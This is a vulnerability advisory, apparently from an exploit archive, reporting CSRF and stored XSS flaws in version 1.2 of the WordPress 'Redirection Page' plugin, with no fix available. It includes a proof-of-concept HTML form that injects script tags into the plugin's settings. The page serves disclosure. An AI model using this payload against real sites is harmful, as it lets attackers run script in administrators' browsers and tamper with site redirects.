what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Redirection Page 1.2 CSRF / XSS

WordPress Redirection Page 1.2 CSRF / XSS
Posted Feb 9, 2015
Authored by Morten Nortoft, Kenneth Jepsen, Mikkel Vej

WordPress Redirection Page plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 8708e64c5d3cb9316c397f0b2945cfe98631e0b256cf9d8a44f41d8430029ce5

WordPress Redirection Page 1.2 CSRF / XSS

Change Mirror Download
Title: WordPress 'Redirection Page' CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015-01-26
Download: https://wordpress.org/plugins/redirection-page/
Contacted WordPress: 2015-01-26
==========================================================

## Plugin description:
==========================================================
Redirect your specified pages, it is usefull when you have 404/not-found pages. Go to Settings Page to start redirection.

## CSRF:
==========================================================
It is possible to change the plugins redirect settings by tricking a logged in admin to visit a crafted page.


## Stored XSS:
==========================================================
Redirect settings from the admin page is stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.

PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add">
<input type="text" name="source" value=""><script>alert(1);</script>"><br />
<input type="text" name="redir" value=""><script>alert(2);</script>"><br />
<input type="submit">
</form>


## Solution
==========================================================
No fix available.
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close